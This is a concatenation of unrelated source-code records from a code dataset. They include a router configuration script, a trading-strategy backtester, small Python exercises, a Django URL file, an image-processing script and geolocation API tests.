= 'Bearer {}'.format(self.token)\n request = requests.get(\n url, headers=headers,\n verify=self.verify)\n return request\n\n def post(self, location, json, authorization_required=True):\n \"\"\"Send data per REST API via post.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n # Login if not yet done\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] = 'Bearer {}'.format(self.token)\n request = requests.post(\n url, headers=headers, json=json,\n verify=self.verify)\n return request\n\n def patch(self, location, json, authorization_required=True):\n \"\"\"Send data per REST API via patch.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n # Login if not yet done\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] = 'Bearer {}'.format(self.token)\n request = requests.patch(\n url, headers=headers, json=json,\n verify=self.verify)\n return request\n\n def login(self):\n json = {\n 'username': self.user,\n }\n if self.password:\n json['password'] = self.password\n else:\n key_file = 'pdc_ssh_key'\n if not os.path.isfile(key_file):\n key_file = '/home/admin/.ssh/pdc_ssh_key'\n\n key_content = ''\n with open(key_file) as fd:\n key_content = fd.read()\n json['local'] = key_content\n request = self.post('/login', json, authorization_required=False)\n if request.status_code == 200:\n self.token = request.json()['token']\n self.authorized = True\n else:\n message = request.json()['message']\n raise UnauthorizedException(message)\n\n def get_routers(self):\n return self.get('/router').json()\n\n def get_nodes(self, router_name):\n return self.get('/config/running/authority/router/{}/node'.format(\n router_name)).json()\n\n def has_uncommitted_changes(self):\n \"\"\"Return whether conductor's candidate config differs from running.\"\"\"\n request = self.get('/config/version?datastore=candidate')\n if request.status_code != 200:\n fatal('Cannot connect to REST API.')\n return request.json()['isDirty']\n\n\ndef log(*messages):\n \"\"\"Write messages to log file.\"\"\"\n print(*messages)\n\ndef fatal(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('FATAL:', *messages)\n sys.exit(1)\n\ndef info(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('INFO:', *messages)\n\ndef warning(*messages):\n \"\"\"Show error message and quit.\"\"\"\n log('WARNING:', *messages)\n\n\ndef parse_arguments():\n \"\"\"Get commandline arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description='Configure selected options of 128T routers')\n parser.add_argument('--router', '-r', help='Router name', required=True)\n parser.add_argument('--commit', '-c', help='Commit config',\n action='store_true')\n parser.add_argument('--yes', help='Commit unconfirmed', action='store_true')\n parser.add_argument('--asset-id', '-a', help='Change asset id')\n parser.add_argument('--enable-asset-resilency', action='store_true')\n parser.add_argument('--enable-maintenance-mode', action='store_true')\n parser.add_argument('--disable-maintenance-mode', action='store_true')\n # for remote conductor (e.g. testing purposes)\n parser.add_argument('--host', help='Conductor hostname')\n parser.add_argument('--user', help='Conductor username (if not localhost)')\n parser.add_argument('--password', help='Conductor password (if not localhost)')\n return parser.parse_args()\n\n\ndef get_config(api, locations, router_name, node_name):\n config = {}\n for dict_key, tup in locations.items():\n location = tup[0].format(router=router_name, node=node_name)\n key = tup[1]\n config[dict_key] = api.get('/config/running' + location).json()[key]\n return config\n\ndef update_config(api, locations, router_name, node_name, changes):\n for dict_key, new_value in changes.items():\n tup = locations[dict_key]\n location = tup[0].format(router=router_name, node=node_name)\n key = tup[1]\n api.patch('/config/candidate' + location, {key: new_value})\n\n\ndef show_changes(router_name, current_config, new_config, commit):\n if current_config == new_config:\n info('Nothing has changed.')\n return {}\n\n if commit:\n mode = 'committed'\n else:\n mode = 'applied to candidate config'\n print('The following changes for router {} will be {}:'.format(\n router_name, mode))\n changes = {}\n for key, value in current_config.items():\n new_value = new_config[key]\n if new_value != value:\n changes[key] = new_value\n print('{}: {} => {}'.format(key, value, new_value))\n return changes\n\n\ndef main():\n args = parse_arguments()\n params = {}\n if args.host:\n params['host'] = args.host\n if args.user and args.password:\n params['user'] = args.user\n params['password'] = args.password\n api = RestGraphqlApi(**params)\n\n if api.has_uncommitted_changes():\n fatal('Conductor has uncommitted changes.',\n 'Quit here to avoid commit conflicts.')\n\n router_name = args.router\n routers = [r['name'] for r in api.get_routers()]\n if router_name not in routers:\n fatal('Specified router in unknown on conductor:', router_name)\n\n nodes = api.get_nodes(router_name)\n num_nodes = len(nodes)\n if num_nodes != 1:\n fatal('This script supports only routers with one node.',\n num_nodes,'found.')\n node_name = nodes[0]['name']\n locations = {\n 'maintenance-mode': ('/authority/router/{router}', 'maintenance-mode'),\n 'asset-connection-resiliency': ('/authority/router/{router}/system/asset-connection-resiliency', 'enabled'),\n 'asset-id': ('/authority/router/{router}/node/{node}', 'asset-id'),\n }\n\n current_config = get_config(api, locations, router_name, node_name)\n new_config = current_config.copy()\n\n if args.asset_id:\n new_config['asset-id'] = args.asset_id\n if args.enable_asset_resilency:\n new_config['asset-connection-resiliency'] = 'true'\n if args.enable_maintenance_mode:\n new_config['maintenance-mode'] = True\n if args.disable_maintenance_mode:\n new_config['maintenance-mode'] = False\n\n changes = show_changes(router_name, current_config, new_config, args.commit)\n if not changes:\n return\n\n if not args.yes:\n answer = input('Please confirm (y/n): ')\n if answer.lower() not in ('y', 'yes'):\n return\n\n update_config(api, locations, router_name, node_name, changes)\n if args.commit:\n api.post('/config/commit', {})\n info('Changes from candidate to running config have been committed.')\n else:\n warning('No --commit argument given. Candidate config has been updated, but NOT committed!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"files/t128-configure-router.py","file_name":"t128-configure-router.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"465030938","text":"from numbers import Number\nimport pandas as pd\nimport abc\nimport numpy as np\nfrom typing import Callable\nfrom utils import read_file, assert_msg, crossover, SMA\n\n\nclass Strategy(metaclass=abc.ABCMeta):\n \"\"\"\n 抽象策略类,用于定义交易策略。\n\n 如果要定义自己的策略类,需要继承这个基类,并实现两个抽象方法:\n Strategy.init\n Strategy.next\n \"\"\"\n\n def __init__(self, broker, data):\n \"\"\"\n 构造策略对象。\n\n @params broker: ExchangeAPI 交易API接口,用于模拟交易\n @params data: list 行情数据数据\n \"\"\"\n self._indicators = []\n self._broker = broker # type: _Broker\n self._data = data # type: _Data\n self._tick = 0\n\n def I(self, func: Callable, *args) -> np.ndarray:\n \"\"\"\n 计算买卖指标向量。买卖指标向量是一个数组,长度和历史数据对应;\n 用于判定这个时间点上需要进行\"买\"还是\"卖\"。\n\n 例如计算滑动平均:\n def init():\n self.sma = self.I(utils.SMA, self.data.Close, N)\n \"\"\"\n value = func(*args)\n value = np.asarray(value)\n assert_msg(value.shape[-1] == len(self._data.Close), '指示器长度必须和data长度相同')\n\n self._indicators.append(value)\n return value\n\n @property\n def tick(self):\n return self._tick\n\n @abc.abstractmethod\n def init(self):\n \"\"\"\n 初始化策略。在策略回测/执行过程中调用一次,用于初始化策略内部状态。\n 这里也可以预计算策略的辅助参数。比如根据历史行情数据:\n 计算买卖的指示器向量;\n 训练模型/初始化模型参数\n \"\"\"\n pass\n\n @abc.abstractmethod\n def next(self, tick):\n \"\"\"\n 步进函数,执行第tick步的策略。tick代表当前的\"时间\"。比如data[tick]用于访问当前的市场价格。\n \"\"\"\n pass\n\n def buy(self):\n self._broker.buy()\n\n def sell(self):\n self._broker.sell()\n\n @property\n def data(self):\n return self._data\n\n\nclass SmaCross(Strategy):\n # 小窗口SMA的窗口大小,用于计算SMA快线\n fast = 10\n\n # 大窗口SMA的窗口大小,用于计算SMA慢线\n slow = 20\n\n def init(self):\n # 计算历史上每个时刻的快线和慢线\n self.sma1 = self.I(SMA, self.data.Close, self.fast)\n self.sma2 = self.I(SMA, self.data.Close, self.slow)\n\n def next(self, tick):\n # 如果此时快线刚好越过慢线,买入全部\n if crossover(self.sma1[:tick], self.sma2[:tick]):\n self.buy()\n\n # 如果是慢线刚好越过快线,卖出全部\n elif crossover(self.sma2[:tick], self.sma1[:tick]):\n self.sell()\n\n # 否则,这个时刻不执行任何操作。\n else:\n pass\n\n\nclass ExchangeAPI:\n def __init__(self, data, cash, commission):\n assert_msg(0 < cash, \"初始现金数量大于0,输入的现金数量:{}\".format(cash))\n assert_msg(0 <= commission <= 0.05, \"合理的手续费率一般不会超过5%,输入的费率:{}\".format(commission))\n self._inital_cash = cash\n self._data = data\n self._commission = commission\n self._position = 0\n self._cash = cash\n self._i = 0\n\n @property\n def cash(self):\n \"\"\"\n :return: 返回当前账户现金数量\n \"\"\"\n return self._cash\n\n @property\n def position(self):\n \"\"\"\n :return: 返回当前账户仓位\n \"\"\"\n return self._position\n\n @property\n def initial_cash(self):\n \"\"\"\n :return: 返回初始现金数量\n \"\"\"\n return self._inital_cash\n\n @property\n def market_value(self):\n \"\"\"\n :return: 返回当前市值\n \"\"\"\n return self._cash + self._position * self.current_price\n\n @property\n def current_price(self):\n \"\"\"\n :return: 返回当前市场价格\n \"\"\"\n return self._data.Close[self._i]\n\n def buy(self):\n \"\"\"\n 用当前账户剩余资金,按照市场价格全部买入\n 买到的数量 = 投入的资金 * (1.0 - 手续费) / 价格\n \"\"\"\n self._position = float(self._cash / (self.current_price * (1 + self._commission)))\n self._cash = 0.0\n\n def sell(self):\n \"\"\"\n 卖出当前账户剩余持仓\n 卖出的收益 = 持有的数量 * 价格 * (1.0 - 手续费)\n \"\"\"\n self._cash += float(self._position * self.current_price * (1 - self._commission))\n self._position = 0.0\n\n def next(self, tick):\n self._i = tick\n\n\nclass Backtest:\n \"\"\"\n Backtest回测类,用于读取历史行情数据/执行策略/模拟交易并估计收益\n \"\"\"\n\n def __init__(self,\n data: pd.DataFrame,\n strategy_type: type(Strategy),\n broker_type: type(ExchangeAPI),\n cash: float = 10000,\n commission: float = .0):\n \"\"\"\n 构造回测对象,需要的参数包含:历史数据,策略对象,初始资金数量,手续费率\n 初始化过程包括检测输入类型,填充数据空值\n :param data: pd.DataFrame pandas DataFrame格式的历史OHLC数据\n :param strategy_type: type(Strategy) 策略类型\n :param broker_type: type(ExchangeAPI) 交易所API类型 负责执行买卖操作\n :param cash: float 初始资金数量\n :param commission: float 每次交易手续费\n \"\"\"\n assert_msg(issubclass(strategy_type, Strategy), \"strategy_type不是一个Strategy类型\")\n assert_msg(issubclass(broker_type, ExchangeAPI), \"strategy_type不是一个Strategy类型\")\n assert_msg(issubclass(commission, Number), \"commission不是浮点数值类型\")\n\n data = data.copy(False)\n\n # 如果没有Volumn列 填充NaN\n if 'Volumn' not in data:\n data['Volumn'] = np.nan\n\n # 验证OHLC数据格式\n assert_msg(len(data.columns & {'Open', 'High', 'Low', 'Close', 'Volume'}) == 5,\n (\"输入的`data`格式不正确,至少需要包含这些列:\"\n \"'Open', 'High', 'Low', 'Close'\"))\n\n # 检查缺失值\n assert_msg(not data[['Open', 'High', 'Low', 'Close']].max().isnull().any(),\n ('部分OHLC包含缺失值,请去掉那些行或者通过差值填充. '))\n\n # 如果行情数据没有按时间排序 重新排序一下\n if not data.index.is_monotonic_increasing:\n data = data.sort_index()\n\n # 利用数据 初始化交易所对象和策略对象\n self._data = data\n self._broker = broker_type(data, cash, commission)\n self._strategy = strategy_type(self._broker, self._data)\n self._results = None\n\n def run(self):\n \"\"\"\n 运行回测,迭代历史数据,执行模拟交易并返回回测结果。\n :return:\n \"\"\"\n strategy = self._strategy\n broker = self._broker\n\n # 策略初始化\n strategy.init()\n\n # 设定回测开始和结束位置\n start = 100\n end = len(self._data)\n\n # 回测主循环,更新市场状态,然后执行策略\n for i in range(start, end):\n # 注意要先把市场状态移动到第i时刻,然后再执行策略\n broker.next(i)\n strategy.next(i)\n\n # 完成策略执行之后,计算结果并返回\n self._results = self._compute_result(broker)\n return self._results\n\n def _compute_result(self, broker):\n s = pd.Series()\n s['初始市值'] = broker.initial_cash\n s['结束市值'] = broker.market_value\n s['收益'] = broker.market_value - broker.initial_cash\n return s\n\n\ndef main():\n BTCUSD = read_file(\"BTCUSD_GEMINI.csv\")\n ret = Backtest(BTCUSD, SmaCross, ExchangeAPI, 10000.0, 0.000).run()\n print(BTCUSD.head())\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"py_core/assets/04-practice/03/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623921849","text":"# 19.In Orange County, 51% of the adults are males. (It doesn't take too much advanced mathematics to deduce that the other\n# 49% are females.) One adult is randomly selected for a survey involving credit card usage. a. Find the prior probability\n# that the selected person is a male. b. It is later learned that the selected survey subject was smoking a cigar. Also, 9.5%\n# of males smoke cigars, whereas 1.7% of females smoke cigars (based on data from the Substance Abuse and Mental Health Services\n# Administration). Use this additional information to find the probability that the selected subject is a male.\n\n\ndef probability_male_given_somker(value1, value2, value3,value4):\n probability = (value1 * value2) / (value1 * value2 + value3 * value4)\n return probability\n\n\np_male = 0.51\np_female = 0.49\np_smoker_given_male = (9.5*0.51)/100\np_smoker_given_female = (1.7*0.49)/100\nprint(probability_male_given_somker(p_male,p_smoker_given_male,p_female,p_smoker_given_female))","sub_path":"Probability/Probability_19.py","file_name":"Probability_19.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"185084140","text":"# TIO_CH22_3.py\n# Copyright Warren & Carter Sande, 2013\n# Released under MIT license http://www.opensource.org/licenses/mit-license.php\n# Version $version ----------------------------\n\n# Odpowiedź do zadania praktycznego 3, z rozdziału 22.\n\n# Zapisujemy dane w pliku za pomocą modułu pickle\n\nimport pickle\n\nimie = raw_input(\"Podaj swoje imię: \")\nwiek = raw_input(\"Podaj swój wiek: \")\nkolor = raw_input(\"Podaj swój ulubiony kolor: \")\npotrawa = raw_input(\"Podaj swoją ulubioną potrawę: \")\n\nmoja_lista = [imie, wiek, kolor, potrawa]\n\nplik = open(\"moj_plik.pkl\", 'w')\npickle.dump(moja_lista, plik)\n\nplik.close()\n\n","sub_path":"przyklady/przyklady/Odpowiedzi/TIO_CH22_3.py","file_name":"TIO_CH22_3.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396215093","text":"import pymongo\n\nclass Sort:\n def __init__(self,order=None):\n self.order = order\n\n self.m = {\n 'ASC': pymongo.ASCENDING,\n 'DESC': pymongo.DESCENDING\n }\n\n def sort(self):\n if not self.order:\n return None\n\n d = []\n for o in self.order:\n name,value = o['name'],o['type']\n d.append((name,self.m[value]))\n return d\n\n","sub_path":"msql/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"400795609","text":"# -*- encoding:utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nimport views\n\n# URLディスパッチャ(詳細はDjangoのヘルプ参照のこと)\nurlpatterns = patterns('',\n url(r'^$', views.IndexView.as_view(), name='index'),\n url(r'^create/$', views.CreateView.as_view(), name='create'),\n url(r'^(?P[^/]+)/$',\n views.DetailView.as_view(), name='detail'),\n url(r'^(?P[^/]+)/delete/$', views.DeleteView.as_view(), name='delete'),\n)\n","sub_path":"dashboards/drillingsystem/router_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576561109","text":"import cv2\r\nimport numpy as np\r\nfrom colour_demosaicing import demosaicing_CFA_Bayer_Menon2007\r\nimport os\r\nfrom tqdm import tqdm\r\nimport time\r\n\r\n# historgram\r\n# pnm_file = ''\r\n# pnm = cv2.imread(pnm_file)\r\n# eq = cv2.equalizeHist(pnm)\r\n\r\n# # convert to 3 channel\r\n# cv2.imwrite('root/wangxin/eq.jpg',demosaicing_CFA_Bayer_Menon2007(eq))\r\n\r\nnames = {}\r\nsave_folder = '/root/wangxin/test/'\r\nwith open('test_dataset.csv', 'r') as f:\r\n r = f.readlines()\r\n for line in r:\r\n line = line.split(',')[0]\r\n path = line.split('/')\r\n folder = path[0].split('_')\r\n folder = '_'.join(folder[:-1]) + '/' + folder[-1]\r\n name = folder + '/' + path[-1].split('.')[0] + '.pnm'\r\n names[name] = 1\r\nn = []\r\nfor key in names:\r\n\tn.append(key)\r\nnames = n\r\nprint(len(names))\r\n#print(names)\r\nnum = 1\r\nt1 = time.time()\r\nfor epoch in tqdm(range(int(len(names)/num))):\r\n\r\n\tpnms = np.zeros([2048,2448*num])\r\n\tfor index,name in enumerate(names[epoch*num:(epoch+1)*num]):\r\n\t\tpnm_file = name\r\n\t\tpnm = cv2.imread('/dataset/training/'+pnm_file,0)\r\n\t\teq = cv2.equalizeHist(pnm)\r\n\t\t#print(pnm.shape)\r\n\t\tpnms[:,index*2448:(index+1)*2448] = eq\r\n\t#print('read over')\r\n\r\n\t#print('eq over')\r\n\tpnms_3 = demosaicing_CFA_Bayer_Menon2007(pnms)\r\n\t#print('demosaicing_CFA_Bayer_Menon2007 over')\r\n\t#print('write')\r\n\tfor index,name in enumerate(names[epoch*num:(epoch+1)*num]):\r\n\t\t#print(pnms_3[:,index*2448:index*2448+2448,:].shape)\r\n\t\timage = pnms_3[:,index*2448:index*2448+2448,:] \r\n\t\t#print(image.shape)\r\n\t\tif not os.path.exists(save_folder+'/'.join(name.split('/')[:-1])):\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-2]))\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-1]))\r\n\t\tcv2.imwrite(save_folder +'.'.join(name.split('.')[:-1])+'.jpg',image)\r\n\t\t#print(index/num)\r\npnms = np.zeros([2048,2448*num])\r\nfor index,name in enumerate(names[(epoch+1)*num:]):\r\n\tpnm_file = name\r\n\tpnm = cv2.imread('/dataset/training/'+pnm_file,0)\r\n\teq = cv2.equalizeHist(pnm)\r\n\t#print(pnm.shape)\r\n\tpnms[:,index*2448:(index+1)*2448] = eq\r\nprint('read over')\r\n\r\nprint('eq over')\r\npnms_3 = demosaicing_CFA_Bayer_Menon2007(pnms)\r\n#print('demosaicing_CFA_Bayer_Menon2007 over')\r\n#print('write')\r\nfor index,name in enumerate(names[(epoch+1)*num:]):\r\n\timage = pnms_3[:,index*2448:(index+1)*2448,:] \r\n\tif not os.path.exists(save_folder+'/'.join(name.split('/')[:-1])):\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-2]))\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-1]))\r\n\tcv2.imwrite(save_folder +'.'.join(name.split('.')[:-1])+'.jpg',image)\r\n\t#print(index/num)\r\nt2 = time.time()\r\nprint(t2-t1,'finished')\r\n\t\t","sub_path":"wangxin/test/channel_parrel.py","file_name":"channel_parrel.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"519863593","text":"import uuid\n\nimport requests_mock\nimport simplejson as json\nfrom sqlalchemy import text\n\nfrom ichnaea.api.exceptions import (\n DailyLimitExceeded,\n InvalidAPIKey,\n LocationNotFound,\n ParseError,\n)\nfrom ichnaea.models import (\n ApiKey,\n Radio,\n)\nfrom ichnaea.tests.factories import (\n CellAreaFactory,\n CellFactory,\n WifiFactory,\n)\nfrom ichnaea import util\n\n\nclass BaseLocateTest(object):\n\n url = None\n apikey_metrics = True\n metric = None\n metric_url = None\n not_found = LocationNotFound\n\n @property\n def test_ip(self):\n # accesses data defined in GeoIPTestCase\n return self.geoip_data['London']['ip']\n\n @property\n def ip_response(self): # pragma: no cover\n return {}\n\n def _call(self, body=None, api_key='test', ip=None, status=200,\n headers=None, method='post_json', **kw):\n if body is None:\n body = {}\n url = self.url\n if api_key:\n url += '?key=%s' % api_key\n extra_environ = {}\n if ip is not None:\n extra_environ = {'HTTP_X_FORWARDED_FOR': ip}\n call = getattr(self.app, method)\n if method == 'get':\n return call(url,\n extra_environ=extra_environ,\n status=status,\n headers=headers,\n **kw)\n else:\n return call(url, body,\n content_type='application/json',\n extra_environ=extra_environ,\n status=status,\n headers=headers,\n **kw)\n\n def check_response(self, response, status):\n self.assertEqual(response.content_type, 'application/json')\n self.assertEqual(response.charset, 'UTF-8')\n if status == 'ok':\n self.assertEqual(response.json, self.ip_response)\n elif status == 'invalid_key':\n self.assertEqual(response.json, InvalidAPIKey.json_body())\n elif status == 'not_found':\n self.assertEqual(response.json, self.not_found.json_body())\n elif status == 'parse_error':\n self.assertEqual(response.json, ParseError.json_body())\n elif status == 'limit_exceeded':\n self.assertEqual(response.json, DailyLimitExceeded.json_body())\n\n def check_model_response(self, response, model,\n country=None, fallback=None,\n expected_names=(), **kw):\n expected = {'country': country}\n for name in ('lat', 'lon', 'accuracy'):\n if name in kw:\n expected[name] = kw[name]\n else:\n model_name = name\n if name == 'accuracy':\n model_name = 'range'\n expected[name] = getattr(model, model_name)\n\n if fallback is not None:\n expected_names = set(expected_names).union(set(['fallback']))\n\n self.assertEqual(response.content_type, 'application/json')\n self.assertEqual(set(response.json.keys()), expected_names)\n\n return expected\n\n def model_query(self, cells=(), wifis=()):\n query = {}\n if cells:\n query['cellTowers'] = []\n for cell in cells:\n radio_name = cell.radio.name\n if radio_name == 'umts':\n radio_name = 'wcdma'\n cell_query = {\n 'radioType': radio_name,\n 'mobileCountryCode': cell.mcc,\n 'mobileNetworkCode': cell.mnc,\n 'locationAreaCode': cell.lac,\n }\n if getattr(cell, 'cid', None) is not None:\n cell_query['cellId'] = cell.cid\n query['cellTowers'].append(cell_query)\n if wifis:\n query['wifiAccessPoints'] = []\n for wifi in wifis:\n query['wifiAccessPoints'].append({\n 'macAddress': wifi.key,\n })\n return query\n\n\nclass CommonLocateTest(BaseLocateTest):\n # tests for all locate API's incl. country\n\n def test_get(self):\n res = self._call(ip=self.test_ip, method='get', status=200)\n self.check_response(res, 'ok')\n\n def test_empty_body(self):\n res = self._call('', ip=self.test_ip, method='post', status=200)\n self.check_response(res, 'ok')\n\n def test_empty_json(self):\n res = self._call(ip=self.test_ip, status=200)\n self.check_response(res, 'ok')\n\n self.check_stats(\n timer=[(self.metric_url, 1)],\n counter=[(self.metric + '.geoip_hit', 1),\n (self.metric_url + '.200', 1),\n (self.metric + '.geoip_city_found', 1)],\n )\n if self.apikey_metrics:\n self.check_stats(\n counter=[(self.metric + '.api_key.test', 1),\n (self.metric + '.api_log.test.geoip_hit', 1)],\n )\n\n def test_error_no_json(self):\n res = self._call('\\xae', method='post', status=400)\n self.check_response(res, 'parse_error')\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.api_key.test'])\n\n def test_error_no_mapping(self):\n res = self._call([1], status=400)\n self.check_response(res, 'parse_error')\n\n def test_error_unknown_key(self):\n res = self._call({'foo': 0}, ip=self.test_ip, status=200)\n self.check_response(res, 'ok')\n\n def test_no_api_key(self, status=400, response='invalid_key'):\n res = self._call(api_key=None, ip=self.test_ip, status=status)\n self.check_response(res, response)\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.no_api_key'])\n\n def test_unknown_api_key(self, status=400, response='invalid_key'):\n res = self._call(api_key='invalid', ip=self.test_ip, status=status)\n self.check_response(res, response)\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.unknown_api_key'])\n\n def test_gzip(self):\n cell = CellFactory.build()\n query = self.model_query(cells=[cell])\n\n body = util.encode_gzip(json.dumps(query))\n headers = {\n 'Content-Encoding': 'gzip',\n }\n res = self._call(body=body, headers=headers,\n method='post', status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n\nclass CommonPositionTest(BaseLocateTest):\n # tests for only the locate_v1 and locate_v2 API's\n\n def test_api_key_limit(self):\n api_key = uuid.uuid1().hex\n self.session.add(ApiKey(valid_key=api_key, maxreq=5, shortname='dis'))\n self.session.flush()\n\n # exhaust today's limit\n dstamp = util.utcnow().strftime('%Y%m%d')\n key = 'apilimit:%s:%s' % (api_key, dstamp)\n self.redis_client.incr(key, 10)\n\n res = self._call(api_key=api_key, ip=self.test_ip, status=403)\n self.check_response(res, 'limit_exceeded')\n\n def test_cell_not_found(self):\n cell = CellFactory.build()\n\n query = self.model_query(cells=[cell])\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_miss',\n self.metric_url + '.' + str(self.not_found.code)],\n timer=[self.metric_url])\n\n def test_cell_lte_radio(self):\n cell = CellFactory(radio=Radio.lte)\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n\n res = self._call(body=query)\n self.check_model_response(res, cell)\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test'])\n\n def test_cellarea(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_cellarea_when_lacf_enabled(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'lacf': True}\n\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_cellarea_when_lacf_disabled(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'lacf': False}\n\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric_url + '.' + str(self.not_found.code),\n self.metric + '.api_key.test']\n )\n\n def test_cellarea_when_different_fallback_set(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'ipf': True}\n\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_wifi_not_found(self):\n wifis = WifiFactory.build_batch(2)\n\n query = self.model_query(wifis=wifis)\n\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric + '.api_key.test',\n self.metric + '.api_log.test.wifi_miss',\n self.metric_url + '.' + str(self.not_found.code)],\n timer=[self.metric_url])\n\n def test_ip_fallback_disabled(self):\n res = self._call(body={\n 'fallbacks': {\n 'ipf': 0,\n }},\n ip=self.test_ip,\n status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric_url + '.' + str(self.not_found.code)],\n )\n\n def test_fallback(self):\n cells = CellFactory.build_batch(2, radio=Radio.wcdma)\n wifis = WifiFactory.build_batch(3)\n api_key = ApiKey.getkey(self.session, 'test')\n api_key.allow_fallback = True\n self.session.flush()\n\n with requests_mock.Mocker() as mock:\n response_location = {\n 'location': {\n 'lat': 1.0,\n 'lng': 1.0,\n },\n 'accuracy': 100,\n }\n mock.register_uri(\n 'POST', requests_mock.ANY, json=response_location)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query)\n\n send_json = mock.request_history[0].json()\n self.assertEqual(len(send_json['cellTowers']), 2)\n self.assertEqual(len(send_json['wifiAccessPoints']), 3)\n self.assertEqual(send_json['cellTowers'][0]['radioType'], 'wcdma')\n\n self.check_model_response(res, None, lat=1.0, lon=1.0, accuracy=100)\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric + '.fallback_hit',\n self.metric_url + '.200',\n self.metric + '.api_log.test.fallback_hit'],\n )\n\n def test_fallback_used_when_geoip_also_present(self):\n cells = CellFactory.build_batch(2, radio=Radio.wcdma)\n wifis = WifiFactory.build_batch(3)\n api_key = ApiKey.getkey(self.session, 'test')\n api_key.allow_fallback = True\n self.session.flush()\n\n with requests_mock.Mocker() as mock:\n response_location = {\n 'location': {\n 'lat': 1.0,\n 'lng': 1.0,\n },\n 'accuracy': 100,\n }\n mock.register_uri(\n 'POST', requests_mock.ANY, json=response_location)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query, ip=self.test_ip)\n\n send_json = mock.request_history[0].json()\n self.assertEqual(len(send_json['cellTowers']), 2)\n self.assertEqual(len(send_json['wifiAccessPoints']), 3)\n\n self.check_model_response(res, None, lat=1.0, lon=1.0, accuracy=100)\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric + '.fallback_hit',\n self.metric_url + '.200',\n self.metric + '.api_log.test.fallback_hit'],\n )\n\n\nclass CommonLocateErrorTest(BaseLocateTest):\n # this is a standalone class to ensure DB isolation for dropping tables\n\n def tearDown(self):\n self.setup_tables(self.db_rw.engine)\n super(CommonLocateErrorTest, self).tearDown()\n\n def test_database_error(self, db_errors=0):\n for tablename in ('wifi', 'cell', 'cell_area',\n 'ocid_cell', 'ocid_cell_area'):\n self.session.execute(text('drop table %s;' % tablename))\n\n cells = CellFactory.build_batch(2)\n wifis = WifiFactory.build_batch(2)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query, ip=self.test_ip)\n self.check_response(res, 'ok')\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[\n self.metric_url + '.200',\n self.metric + '.geoip_hit',\n ],\n )\n self.check_raven([('ProgrammingError', 